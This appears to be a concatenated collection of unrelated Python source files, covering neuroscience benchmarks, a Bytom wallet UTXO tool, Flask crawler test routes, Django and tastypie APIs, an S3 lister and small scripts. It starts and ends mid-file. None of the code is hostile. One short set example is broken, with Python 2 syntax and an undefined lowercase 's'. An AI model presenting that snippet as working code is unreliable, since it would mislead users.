SIM.free_all()
print("GOT HERE 2")
| python |
import brainscore
from brainscore.benchmarks._neural_common import NeuralBenchmark, average_repetition
from brainscore.metrics.ceiling import InternalConsistency, RDMConsistency
from brainscore.metrics.rdm import RDMCrossValidated
from brainscore.metrics.regression import CrossRegressedCorrelation, pls_regression, pearsonr_correlation, \
single_regression
from brainscore.utils import LazyLoad
from result_caching import store
VISUAL_DEGREES = 4
NUMBER_OF_TRIALS = 20
def _MovshonFreemanZiemba2013Region(region, identifier_metric_suffix, similarity_metric, ceiler):
assembly_repetition = LazyLoad(lambda region=region: load_assembly(False, region=region))
assembly = LazyLoad(lambda region=region: load_assembly(True, region=region))
return NeuralBenchmark(identifier=f'movshon.FreemanZiemba2013.{region}-{identifier_metric_suffix}', version=2,
assembly=assembly, similarity_metric=similarity_metric, parent=region,
ceiling_func=lambda: ceiler(assembly_repetition),
visual_degrees=VISUAL_DEGREES, number_of_trials=NUMBER_OF_TRIALS,
paper_link='https://www.nature.com/articles/nn.3402')
def MovshonFreemanZiemba2013V1PLS():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='pls',
similarity_metric=CrossRegressedCorrelation(
regression=pls_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V1Single():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='single',
similarity_metric=CrossRegressedCorrelation(
regression=single_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V1RDM():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='rdm',
similarity_metric=RDMCrossValidated(
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=RDMConsistency())
def MovshonFreemanZiemba2013V2PLS():
return _MovshonFreemanZiemba2013Region('V2', identifier_metric_suffix='pls',
similarity_metric=CrossRegressedCorrelation(
regression=pls_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V2RDM():
return _MovshonFreemanZiemba2013Region('V2', identifier_metric_suffix='rdm',
similarity_metric=RDMCrossValidated(
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=RDMConsistency())
@store()
def load_assembly(average_repetitions, region, access='private'):
assembly = brainscore.get_assembly(f'movshon.FreemanZiemba2013.{access}')
assembly = assembly.sel(region=region)
assembly = assembly.stack(neuroid=['neuroid_id']) # work around xarray multiindex issues
assembly['region'] = 'neuroid', [region] * len(assembly['neuroid'])
assembly.load()
time_window = (50, 200)
assembly = assembly.sel(time_bin=[(t, t + 1) for t in range(*time_window)])
assembly = assembly.mean(dim='time_bin', keep_attrs=True)
assembly = assembly.expand_dims('time_bin_start').expand_dims('time_bin_end')
assembly['time_bin_start'], assembly['time_bin_end'] = [time_window[0]], [time_window[1]]
assembly = assembly.stack(time_bin=['time_bin_start', 'time_bin_end'])
assembly = assembly.squeeze('time_bin')
assembly = assembly.transpose('presentation', 'neuroid')
if average_repetitions:
assembly = average_repetition(assembly)
return assembly
| python |
import json, time, argparse, getpass, re, requests
try:
input = raw_input
except NameError:
pass
parser = argparse.ArgumentParser(description='Bytom UTXO Tool')
parser.add_argument('-o', '--url', default='http://127.0.0.1:9888', dest='endpoint', help='API endpoint')
parser.add_argument('--http-user', default=None, dest='http_user', help='HTTP Basic Auth Username')
parser.add_argument('--http-pass', default=None, dest='http_pass', help='HTTP Basic Auth Password')
parser.add_argument('--cert', default=None, dest='https_cert', help='HTTPS Client Certificate')
parser.add_argument('--key', default=None, dest='https_key', help='HTTPS Client Key')
parser.add_argument('--ca', default=None, dest='https_ca', help='HTTPS CA Certificate')
parser.add_argument('--no-verify', action='store_true', dest='https_verify', help='Do not verify HTTPS server certificate')
parser.add_argument('-p', '--pass', default=None, dest='bytom_pass', help='Bytom Account Password')
parser.add_argument('-l', '--list', action='store_true', dest='only_list', help='Show UTXO list without merge')
parser.add_argument('-m', '--merge', default=None, dest='merge_list', help='UTXO to merge')
parser.add_argument('-a', '--address', default=None, dest='address', help='Transfer address')
parser.add_argument('-y', '--yes', action='store_true', dest='confirm', help='Confirm transfer')
class BytomException(Exception):
pass
class JSONRPCException(Exception):
pass
class Callable(object):
def __init__(self, name, func):
self.name = name
self.func = func
def __call__(self, *args, **kwargs):
return self.func(self.name, *args, **kwargs)
class JSONRPC(object):
def __init__(self, endpoint, httpverb='POST', **kwargs):
self.url = endpoint.rstrip('/')
self.httpverb = httpverb
self.kwargs = kwargs
def __getattr__(self, name):
return Callable(name.replace('_', '-'), self.callMethod)
def callMethod(self, method, params={}):
m = requests.request(self.httpverb, '{}/{}'.format(self.url, method), json=params, **self.kwargs)
data = m.json()
if data.get('status') == 'success':
return data['data']
raise JSONRPCException(data.get('msg') or data.get('message') or str(data))
def send_tx(bytomd, utxo_list, to_address, password):
actions = []
amount = 0
for utxo in utxo_list:
actions.append({
'type': 'spend_account_unspent_output',
'output_id': utxo['id'],
})
amount += utxo['amount']
actions.append({
'amount': amount,
'asset_id': 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff',
'type': 'control_address',
'address': to_address,
})
transaction = bytomd.build_transaction({
'base_transaction' : None,
'actions' : actions,
'ttl' : 1
})
gas_info = bytomd.estimate_transaction_gas({
'transaction_template': transaction
})
fee = gas_info['total_neu']
actions[-1]['amount'] -= fee
time.sleep(1)
transaction = bytomd.build_transaction({
'base_transaction': None,
'actions': actions,
'ttl': 1,
})
signed_transaction = bytomd.sign_transaction({
'transaction': transaction,
'password': password,
})
if signed_transaction['sign_complete']:
raw_transaction = signed_transaction['transaction']['raw_transaction']
result = bytomd.submit_transaction({'raw_transaction': raw_transaction})
return result['tx_id']
else:
raise BytomException('Sign not complete')
def parse_id_list(id_list_str, list_all):
for id_str in id_list_str.split(','):
id_ = id_str.strip()
if not id_:
pass
elif id_.strip().lower() == 'all':
for i in list_all:
yield i
return
elif re.match('(\d+)-(\d+)', id_):
start, end = re.match('(\d+)-(\d+)', id_).groups()
for i in range(int(start), int(end) + 1):
yield i
elif not id_.strip().isdigit():
print('Ignored: Incorrect index {}'.format(id_))
else:
idx = int(id_.strip())
yield idx
def main():
options = parser.parse_args()
api_params = {}
if options.http_user and options.http_pass:
api_params['auth'] = (options.http_user, options.http_pass)
if options.https_cert:
if options.https_key:
api_params['cert'] = (options.https_cert, options.https_key)
else:
api_params['cert'] = options.https_cert
if options.https_ca:
api_params['verify'] = options.https_ca
elif options.https_verify:
api_params['verify'] = False
bytomd = JSONRPC(options.endpoint, **api_params)
utxolist = bytomd.list_unspent_outputs()
current_block = bytomd.get_block_count()['block_count']
for i, utxo in enumerate(utxolist):
print('{:4}. {:13.8f} BTM {}{}'.format(i, utxo['amount'] / 1e8, utxo['id'], ' (not mature)' if utxo['valid_height'] > current_block else ''))
if options.only_list:
return
utxo_idlist = options.merge_list or input('Merge UTXOs (1,3,5 or 1-10 or all): ')
utxo_mergelist = []
utxo_idset = set()
for idx in parse_id_list(utxo_idlist, range(len(utxolist))):
if idx in utxo_idset:
print('Ignored: Duplicate index {}'.format(idx))
elif not 0 <= idx < len(utxolist):
print('Ignored: Index out of range {}'.format(idx))
elif utxolist[idx]['valid_height'] > current_block:
print('Ignored: UTXO[{}] not mature'.format(idx))
else:
utxo_mergelist.append(utxolist[idx])
utxo_idset.add(idx)
if len(utxo_mergelist) < 2:
print('Not Merge UTXOs, Exit...')
return
print('To merge {} UTXOs with {:13.8f} BTM'.format(len(utxo_mergelist), sum(utxo['amount'] for utxo in utxo_mergelist) / 1e8))
if not options.address:
options.address = input('Transfer Address: ')
if not options.bytom_pass:
options.bytom_pass = getpass.getpass('Bytom Account Password: ')
if not (options.confirm or input('Confirm [y/N] ').lower() == 'y'):
print('Not Merge UTXOs, Exit...')
return
print(send_tx(bytomd, utxo_mergelist, options.address, options.bytom_pass))
if __name__ == '__main__':
main()
| python |
S = set()
S.add(5)
S.add(3)
S.add(1)
# Prints out the numbers 5, 3, 1 in no particular order
for element in S:
print "{} is in the set".format(element)
S.remove(3)
S.remove(5)
s.remove(1) | python |
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module serving all the traffic for javascript test cases."""
import os
from flask import abort
from flask import Blueprint
from flask import make_response
from flask import render_template
from flask import Response
from flask import send_from_directory
from flask import url_for
javascript_module = Blueprint(
"javascript_module", __name__, template_folder="templates")
# Global app.instance_path is not accessible from blueprints ¯\_(ツ)_/¯.
TEST_CASES_PATH = os.path.abspath(__file__ + "/../../../test-cases/javascript/")
@javascript_module.route("/misc/comment.js")
def comment():
content = "// " + url_for(
"index", _external=True) + "test/javascript/misc/comment.found"
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/misc/string-variable.js")
def string_variable():
content = "var url = \"" + url_for(
"index", _external=True) + "test/javascript/misc/string-variable.found\";"
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/frameworks/angular/")
def angular_root():
# Redirect straight to the Angular app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/angular/index.html"
return r
@javascript_module.route("/frameworks/polymer/")
def polymer_root():
# Redirect straight to the Polymer app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/polymer/index.html"
return r
@javascript_module.route("/frameworks/react/")
def react_root():
# Redirect straight to the React app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/react/index.html"
return r
@javascript_module.route("/misc/string-concat-variable.js")
def string_concat_variable():
content = "var domain = \"" + url_for(
"index", _external=True
) + ("\";var path = \"test/javascript/misc/string-concat-variable.found\";var"
" full = domain + path;")
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/", defaults={"path": ""})
@javascript_module.route("/<path:path>")
def html_dir(path):
"""Lists contents of requested directory."""
requested_path = os.path.join(TEST_CASES_PATH, path)
if not os.path.exists(requested_path):
return abort(404)
if os.path.isdir(requested_path):
files = os.listdir(requested_path)
return render_template("list-javascript-dir.html", files=files, path=path)
if os.path.isfile(requested_path):
return send_from_directory("test-cases/javascript", path)
| python |
import sqlite3
import os.path
from os import listdir, getcwd
import sys
from os import listdir
from os.path import isfile, join
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
db_dir = os.path.join(BASE_DIR,"sql/")
img_dir = os.path.join(BASE_DIR,"images/")
full_dir = lambda x,y: x+y
known_faces_imgs = full_dir(img_dir,'known_faces/')
new_faces_imgs = full_dir(img_dir,'new_faces/')
imgs1 = [f for f in listdir(known_faces_imgs) if isfile(join(known_faces_imgs, f))]
imgs2 = [f for f in listdir(new_faces_imgs) if isfile(join(new_faces_imgs, f))]
#telechargi 2 images pour tester
'''
import urllib.request
def store_image(url, local_file_name):
with urllib.request.urlopen(url) as resource:
with open(local_file_name, 'wb') as f:
f.write(resource.read())
store_image('https://upload.wikimedia.org/wikipedia/commons/2/25/Chris_Evans_SDCC_2014.jpg',
'1.jpg')
store_image('https://img.buzzfeed.com/buzzfeed-static/static/2018-01/11/18/campaign_images/buzzfeed-prod-fastlane-01/chris-evans-uses-nothing-on-his-beard-its-just-th-2-20079-1515714803-5_dblbig.jpg',
'2.jpg')
'''
def codb(db_file):
db_file = full_dir(db_dir,db_file)
print(db_file)
db_is_new = not os.path.exists(db_file)
conn = sqlite3.connect(db_file)
if db_is_new:
print (db_file,"DONE")
sql = "create table if not exists elements ("
sql +="ID INTEGER PRIMARY KEY AUTOINCREMENT,"
sql+="IMAGE BLOB,TYPE TEXT,NOM TEXT);"
conn.execute(sql)
else:
print ("Schema exists")
print
return conn
def insert_picture(db,imgs):
conn = codb(db)
for i in imgs:
picture_file=full_dir(full_dir(img_dir,db+"/"),i)
with open(picture_file, 'rb') as input_file:
ablob = input_file.read()
base=os.path.basename(picture_file)
afile, ext = os.path.splitext(base)
sql = "INSERT INTO elements"
sql+="(IMAGE, TYPE,NOM) VALUES(?, ?,?);"
conn.execute(sql,[sqlite3.Binary(ablob), ext, afile])
conn.commit()
conn.close()
def make_new():
#db1
insert_picture('known_faces',imgs1)
#db2
insert_picture('new_faces',imgs2)
| python |
data = open('data/input6.txt', 'r')
orbs = data.readlines()
d = {}
for orb in orbs:
c1 = orb[:3]
c2 = orb[4:7]
d[c2] = c1
s = 0
for p in d:
curr_p = p
while curr_p in d:
curr_p = d[curr_p]
s += 1
print(s)
trajet_you = []
curr = 'YOU'
while True:
if curr not in d: break
curr = d[curr]
trajet_you += [curr]
i = 0
curr = 'SAN'
while True:
i += 1
curr = d[curr]
if curr in trajet_you:break
print(trajet_you.index(curr) + i - 1) | python |
#! /usr/bin/env python
#
# Check the option usage.
# Make sure the union member matches the option type.
#
import sys, os, fnmatch
# just use the first letter of the member name - should be unique
opt_suffix = {
'b' : 'AT_BOOL',
'a' : 'AT_IARF',
'n' : 'AT_NUM',
'l' : 'AT_LINE',
't' : 'AT_POS'
}
opts = { }
def check_file (fn):
problems = 0
fd = open(fn, 'r')
line_no = 0
for line in fd:
line_no = line_no + 1
cpd = line.find('cpd.settings[UO_')
if cpd > 0:
sb = line[cpd:].find(']')
opt = line[cpd + 13 : cpd + sb]
mem = line[cpd + sb + 2]
if opt in opts and mem in opt_suffix:
if opts[opt] != opt_suffix[mem]:
print fn + '[%d]' % (line_no) , opt, 'should use', opts[opt], 'not', opt_suffix[mem]
problems += 1
return problems
def main (argv):
# Read in all the options
of = open(os.path.join('src', 'options.cpp'), 'r');
for line in of:
if line.find('unc_add_option') > 0 and line.find('UO_') > 0:
ps = line.split(',')
if len(ps) >= 3:
opts[ps[1].strip()] = ps[2].strip()
of.close()
# Get a list of all the source files
ld = os.listdir('src')
src_files = fnmatch.filter(ld, '*.cpp')
src_files.extend(fnmatch.filter(ld, '*.h'))
# Check each source file
problems = 0
for fn in src_files:
problems += check_file(os.path.join('src', fn))
if problems == 0:
print 'No problems found'
if __name__ == '__main__':
main(sys.argv)
| python |
from pathlib import Path
import pytest
from md_translate.exceptions import ObjectNotFoundException, FileIsNotMarkdown
from md_translate.files_worker import FilesWorker
TEST_FIRST_FILE = 'tests/test_data/md_files_folder/first_file.md'
TEST_SECOND_FILE = 'tests/test_data/md_files_folder/second_file.md'
class SettingsMock:
def __init__(self, path):
self.path = Path('tests/test_data').joinpath(path)
class TestFilesWorker:
@pytest.mark.parametrize('path, err', [
['not existing folder', ObjectNotFoundException],
['folder_without_md_files', FileNotFoundError],
['not_a_folder', FileIsNotMarkdown],
['not_markdown_file.txt', FileIsNotMarkdown],
])
def test_folder_errors(self, path, err):
with pytest.raises(err):
FilesWorker(SettingsMock(path)).get_md_files()
def test_multiple_objects(self):
file_worker_object = FilesWorker(SettingsMock('md_files_folder'))
assert file_worker_object.single_file == False
assert sorted(file_worker_object.get_md_files()) == [Path(TEST_FIRST_FILE), Path(TEST_SECOND_FILE)]
def test_single_object(self):
file_worker_object = FilesWorker(SettingsMock('md_files_folder/first_file.md'))
assert file_worker_object.single_file == True
assert file_worker_object.get_md_files() == [Path(TEST_FIRST_FILE)]
| python |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page as page_module
from telemetry.page import page_set as page_set_module
class Top20Page(page_module.Page):
def __init__(self, url, page_set, name=''):
super(Top20Page, self).__init__(url=url, page_set=page_set, name=name)
self.archive_data_file = '../data/chrome_proxy_top_20.json'
class Top20PageSet(page_set_module.PageSet):
""" Pages hand-picked for Chrome Proxy tests. """
def __init__(self):
super(Top20PageSet, self).__init__(
archive_data_file='../data/chrome_proxy_top_20.json')
# Why: top google property; a google tab is often open
self.AddPage(Top20Page('https://www.google.com/#hl=en&q=barack+obama',
self))
# Why: #3 (Alexa global)
self.AddPage(Top20Page('http://www.youtube.com', self))
# Why: #18 (Alexa global), Picked an interesting post
self.AddPage(Top20Page(
# pylint: disable=C0301
'http://en.blog.wordpress.com/2012/09/04/freshly-pressed-editors-picks-for-august-2012/',
self, 'Wordpress'))
# Why: top social,Public profile
self.AddPage(Top20Page('http://www.facebook.com/barackobama', self,
'Facebook'))
# Why: #12 (Alexa global),Public profile
self.AddPage(Top20Page('http://www.linkedin.com/in/linustorvalds', self,
'LinkedIn'))
# Why: #6 (Alexa) most visited worldwide,Picked an interesting page
self.AddPage(Top20Page('http://en.wikipedia.org/wiki/Wikipedia', self,
'Wikipedia (1 tab)'))
# Why: #8 (Alexa global),Picked an interesting page
self.AddPage(Top20Page('https://twitter.com/katyperry', self, 'Twitter'))
# Why: #37 (Alexa global)
self.AddPage(Top20Page('http://pinterest.com', self, 'Pinterest'))
# Why: #1 sports
self.AddPage(Top20Page('http://espn.go.com', self, 'ESPN'))
# Why: #1 news worldwide (Alexa global)
self.AddPage(Top20Page('http://news.yahoo.com', self))
# Why: #2 news worldwide
self.AddPage(Top20Page('http://www.cnn.com', self))
# Why: #7 (Alexa news); #27 total time spent,Picked interesting page
self.AddPage(Top20Page(
'http://www.weather.com/weather/right-now/Mountain+View+CA+94043',
self, 'Weather.com'))
# Why: #1 world commerce website by visits; #3 commerce in the US by time
# spent
self.AddPage(Top20Page('http://www.amazon.com', self))
# Why: #1 commerce website by time spent by users in US
self.AddPage(Top20Page('http://www.ebay.com', self))
# Why: #1 games according to Alexa (with actual games in it)
self.AddPage(Top20Page('http://games.yahoo.com', self))
# Why: #1 Alexa recreation
self.AddPage(Top20Page('http://booking.com', self))
# Why: #1 Alexa reference
self.AddPage(Top20Page('http://answers.yahoo.com', self))
# Why: #1 Alexa sports
self.AddPage(Top20Page('http://sports.yahoo.com/', self))
# Why: top tech blog
self.AddPage(Top20Page('http://techcrunch.com', self))
self.AddPage(Top20Page('http://www.nytimes.com', self))
| python |
# -*- coding: utf-8 -*-
##
# @file backend.py
# @brief
# @author wondereamer
# @version 0.5
# @date 2016-07-10
from quantity.digger.event.rpc import EventRPCServer
from quantity.digger.event.eventengine import ZMQEventEngine
from quantity.digger.interaction.interface import BackendInterface
from quantity.digger.util import mlogger as log
from quantity.digger.datasource.data import DataManager
from quantity.digger.datastruct import PContract
from quantity.digger.interaction.serialize import (
serialize_pcontract_bars,
serialize_all_pcontracts,
serialize_all_contracts,
)
class Backend(BackendInterface):
## @TODO singleton
SERVER_FOR_UI = 'backend4ui'
SERVER_FOR_SHELL = "backend4shell"
def __init__(self):
log.info("Init Backend..")
self._engine = ZMQEventEngine('Backend')
self._engine.start()
self._shell_srv = EventRPCServer(self._engine,
self.SERVER_FOR_SHELL)
self._ui_srv = EventRPCServer(self._engine,
self.SERVER_FOR_UI)
self.register_functions(self._shell_srv)
self.register_functions(self._ui_srv)
def register_functions(self, server):
server.register('get_all_contracts', self.get_all_contracts)
server.register('get_all_pcontracts', self.get_all_pcontracts)
server.register('get_pcontract', self.get_pcontract)
server.register('get_strategies', self.get_strategies)
server.register('run_strategy', self.run_strategy)
server.register('run_technical', self.run_technical)
def stop(self):
log.info('Backend stopped.')
self._engine.stop()
def get_all_contracts(self):
# 模拟接口
data = ['CC.SHFE-1.MINUTE', 'BB.SHFE-1.MINUTE']
pcons = [PContract.from_string(d) for d in data]
contracts = [pcon.contract for pcon in pcons]
return serialize_all_contracts(contracts)
def get_all_pcontracts(self):
# 模拟接口
data = ['CC.SHFE-1.MINUTE', 'BB.SHFE-1.MINUTE']
pcontracts = [PContract.from_string(d) for d in data]
return serialize_all_pcontracts(pcontracts)
def get_pcontract(self, str_pcontract):
dm = DataManager()
da = dm.get_bars(str_pcontract)
return serialize_pcontract_bars(str_pcontract, da.data)
def run_strategy(self, name):
""""""
return
def run_technical(self, name):
return
def get_technicals(self):
""" 获取系统的所有指标。 """
from quantity.digger.technicals import get_techs
return get_techs()
def get_strategies(self):
return 'hello'
#backend.get_all_contracts()
#backend.get_pcontract('BB.TEST-1.MINUTE')
if __name__ == '__main__':
backend = Backend()
import time, sys
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
backend.stop()
sys.exit(0)
| python |
#%% Test Module
from pyCMC import CMC
def test_results(returnVal, tname):
if 'status' in returnVal.keys():
if returnVal['status']['error_code'] == 0:
print('{} works!'.format(tname))
else:
print('Error message: {}'.format(returnVal['status']['error_message']))
else:
print(returnVal)
with open('./cmc_key.key', 'r') as f:
cmc_key = f.readline().strip()
cmc = CMC(cmc_key)
# Map
map_data = cmc.map()
test_results(map_data, 'Map')
# Metadata
meta_data = cmc.metadata(slug='bitcoin,ethereum,litecoin')
test_results(meta_data, 'Metadata')
# Listings
listings = cmc.listings(start=1, limit=5, convert='EUR', convert_id=None, sort='market_cap')
test_results(listings, 'Listings')
# Quotes
quotes = cmc.quotes(coinId=None, slug='ethereum')
test_results(quotes, 'Quotes')
# Global Metrics
metrics = cmc.global_metrics()
test_results(metrics, 'Metrics')
# Convert Price
convert = cmc.convert_price(2, coinId=None, symbol='ETH', convert='USD')
test_results(convert, 'Convert')
# These should return errors before calling the API
print('\nThe remaining functions should all return errors.\n')
# Listings
err_listings = cmc.listings(start=1, limit='10', convert='EUR', convert_id=None, sort='market_cap')
test_results(err_listings, 'Error Listings')
# Quotes
err_quotes = cmc.quotes(coinId=None, slug=None)
test_results(err_quotes, 'Error Quotes')
# Convert Price
err_convert = cmc.convert_price(1.5e9, coinId=None, symbol='ETH', convert='USD')
test_results(err_convert, 'Convert')
| python |
from django.http import HttpResponse, HttpRequest, HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.core.context_processors import csrf
from django.conf import settings
from django.contrib.auth.models import User, Group
from reports.models import BusinessUnit, Machine
from guardian.shortcuts import get_objects_for_user
try:
BUSINESS_UNITS_ENABLED = settings.BUSINESS_UNITS_ENABLED
except:
BUSINESS_UNITS_ENABLED = False
PROJECT_DIR = settings.PROJECT_DIR
def index(request):
#business_units = BusinessUnit.objects.all()
business_units = get_objects_for_user(request.user, 'reports.can_view_businessunit')
hanlde=open(PROJECT_DIR+"/../version", 'r+')
version=hanlde.read()
return {'business_units_enabled': BUSINESS_UNITS_ENABLED,
'business_units': business_units,
'webadmin_version': version} | python |
#!/Users/juan/venv-3.8.6/bin/python3.8
# Copyright 2020 Telleztec.com, Juan Tellez, All Rights Reserved
#
import boto3
import datetime
import argparse
# convert bytes to kb, mb, and gb
def to_units(b, unit):
if unit=='b':
return b
elif unit=='k':
return round(b/1000, 2)
elif unit=='m':
return round(b/(1000*1000), 2)
elif unit=='g':
return round(b/(1000*1000*1000), 2)
# list_buckets prints the name of all buckets and the creation time
def list_buckets(s3):
for bucket in s3.buckets.all():
d = bucket.creation_date
print('{:<30s}{:>52s}'.format(
bucket.name, d.isoformat(' ')))
# list_bucket_usage prints all buckets, date of the newst object and the total disk used
def list_bucket_usage(s3, unit):
totalSizeBytes = 0
for bucket in s3.buckets.all():
d = bucket.creation_date
newest = datetime.datetime(datetime.MINYEAR,1,1,tzinfo=datetime.timezone.utc)
for obj in bucket.objects.all():
totalSizeBytes += obj.size
if newest < obj.last_modified:
newest = obj.last_modified
print('{:<30s} {:s} {:s} {:>16.2f}'.format(bucket.name, d.isoformat(' '), newest.isoformat(' '),
to_units(totalSizeBytes, unit)))
# list_files prints all the objects in a bucket.
def list_files(s3, unit):
totalSizeBytes = 0
for bucket in s3.buckets.all():
for obj in bucket.objects.all():
d = obj.last_modified
print('{:<30s}{:>52s} {:>10f}'.format(
bucket.name, d.isoformat(' '), to_units(obj.size, unit)))
def main():
parser = argparse.ArgumentParser(prog='s3ls')
parser.add_argument('--region', nargs=1, default='us-east-1',
help='AWS region, e.g. us-east-1')
parser.add_argument('--unit', choices=['b','k','m', 'g'], default='b',
help='Unit to display disk usage in: b, k, m or g')
parser.add_argument('do', choices=['space', 'files', 'buckets'], default='space',
help='Tells the tool what to do: Print space usage, list files or buckets')
namespace = parser.parse_args()
args = vars(namespace)
region = args['region']
unit = args['unit']
session = boto3.session.Session()
s3 = session.resource('s3', region[0])
if args['do'] == 'space':
list_bucket_usage(s3, unit)
elif args['do'] == 'buckets':
list_buckets(s3)
elif args['do'] == 'files':
list_files(s3, unit)
if __name__ == "__main__":
main()
| python |
from django.db.models import Count
from tastypie.resources import ModelResource, ALL_WITH_RELATIONS
from tastypie import http, fields
from tastypie.exceptions import ImmediateHttpResponse
from tastypie.bundle import Bundle
import json
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.http import HttpResponse
from .models import Run, RunCaseVersion, RunSuite, Result
from ..mtapi import MTResource, MTApiKeyAuthentication, MTAuthorization
from ..core.api import (ProductVersionResource, ProductResource,
ReportResultsAuthorization, UserResource)
from ..environments.api import EnvironmentResource
from ..environments.models import Environment
from ..library.api import (CaseVersionResource, BaseSelectionResource,
SuiteResource)
from ..library.models import CaseVersion, Suite
from ...view.lists.filters import filter_url
import logging
logger = logging.getLogger(__name__)
class RunSuiteAuthorization(MTAuthorization):
"""Atypically named permission."""
@property
def permission(self):
"""This permission should be checked by is_authorized."""
return "execution.manage_runs"
class RunCaseVersionResource(ModelResource):
"""
RunCaseVersion represents the connection between a run and a caseversion.
It is possible to return a result for each runcaseversion. So the result
will sit as a peer to the caseversion under the runcaseversion.
"""
run = fields.ToOneField(
"moztrap.model.execution.api.RunResource",
"run",
related_name="runcaseversion")
caseversion = fields.ToOneField(CaseVersionResource, "caseversion", full=True)
class Meta:
queryset = RunCaseVersion.objects.all()
list_allowed_methods = ['get']
filtering = {
"run": ALL_WITH_RELATIONS,
"caseversion": ALL_WITH_RELATIONS,
}
fields = ["id", "run"]
class RunResource(ModelResource):
"""
Fetch the test runs for the specified product and version.
It is also possible to create a new testrun, when posted.
"""
productversion = fields.ForeignKey(ProductVersionResource, "productversion")
environments = fields.ToManyField(
EnvironmentResource,
"environments",
full=False,
)
runcaseversions = fields.ToManyField(
RunCaseVersionResource,
"runcaseversions",
)
class Meta:
queryset = Run.objects.all()
list_allowed_methods = ["get", "post"]
fields = [
"id",
"name",
"description",
"status",
"productversion",
"environments",
"runcaseversions",
]
filtering = {
"productversion": ALL_WITH_RELATIONS,
"status": "exact",
}
authentication = MTApiKeyAuthentication()
authorization = ReportResultsAuthorization()
always_return_data = True
def dehydrate(self, bundle):
"""Add some convenience fields to the return JSON."""
pv = bundle.obj.productversion
bundle.data["productversion_name"] = pv.version
bundle.data["product_name"] = pv.product.name
return bundle
def dispatch_detail(self, request, **kwargs):
"""For details, we want the full info on environments for the run """
self.fields["environments"].full = True
return super(RunResource, self).dispatch_detail(request, **kwargs)
def dispatch_list(self, request, **kwargs):
"""For list, we don't want the full info on environments """
self.fields["environments"].full = False
return super(RunResource, self).dispatch_list(request, **kwargs)
def create_response(self, request, data,
response_class=HttpResponse, **response_kwargs):
"""On posting a run, return a url to the MozTrap UI for that new run."""
resp = super(RunResource, self).create_response(
request,
data,
response_class=response_class,
**response_kwargs
)
if isinstance(data, Bundle):
# data will be a bundle if we are creating a new Run. And in that
# case we want to add a URI to viewing this new run result in the UI
full_url = filter_url(
"results_runcaseversions",
Run.objects.get(pk=data.data["id"]),
)
new_content = json.loads(resp.content)
new_content["ui_uri"] = full_url
new_content["resource_uri"] = data.data["resource_uri"]
resp.content = json.dumps(new_content)
# need to set the content type to application/json
resp._headers["content-type"] = ("Content-Type", "application/json; charset=utf-8")
return resp
def obj_create(self, bundle, request=None, **kwargs):
"""Set the created_by field for the run to the request's user"""
bundle = super(RunResource, self).obj_create(bundle=bundle, request=request, **kwargs)
bundle.obj.created_by = request.user
bundle.obj.save()
return bundle
def hydrate_runcaseversions(self, bundle):
"""
Handle the runcaseversion creation during a POST of a new Run.
Tastypie handles the creation of the run itself. But we handle the
RunCaseVersions and Results because we have special handler methods for
setting the statuses which we want to keep DRY.
"""
try:
run = bundle.obj
run.save()
# walk results
for data in bundle.data["runcaseversions"]:
status = data.pop("status")
# find caseversion for case
cv = CaseVersion.objects.get(
productversion=run.productversion,
case=data.pop("case"),
)
# create runcaseversion for this run to caseversion
rcv, created = RunCaseVersion.objects.get_or_create(
run=run,
caseversion=cv,
)
data["user"] = bundle.request.user
data["environment"] = Environment.objects.get(
pk=data["environment"])
# create result via methods on runcaseversion
rcv.get_result_method(status)(**data)
bundle.data["runcaseversions"] = []
return bundle
except KeyError as e:
raise ValidationError(
"bad result object data missing key: {0}".format(e))
except ObjectDoesNotExist as e:
raise ValidationError(e)
class ResultResource(ModelResource):
"""
Endpoint for submitting results for a set of runcaseversions.
This endpoint is write only. The submitted result objects should
be formed like this::
{
"objects": [
{
"case": "1",
"environment": "23",
"run_id": "1",
"status": "passed"
},
{
"case": "14",
"comment": "why u no make sense??",
"environment": "23",
"run_id": "1",
"status": "invalidated"
},
{
"bug": "http://www.deathvalleydogs.com",
"case": "326",
"comment": "why u no pass?",
"environment": "23",
"run_id": "1",
"status": "failed",
"stepnumber": 1
}
]
}
"""
class Meta:
queryset = Result.objects.all()
resource_name = "result"
list_allowed_methods = ["patch"]
authentication = MTApiKeyAuthentication()
authorization = ReportResultsAuthorization()
def obj_create(self, bundle, request=None, **kwargs):
"""
Manually create the proper results objects.
This is necessary because we have special handler methods in
RunCaseVersion for setting the statuses which we want to keep DRY.
"""
data = bundle.data.copy()
try:
status = data.pop("status")
case = data.pop("case")
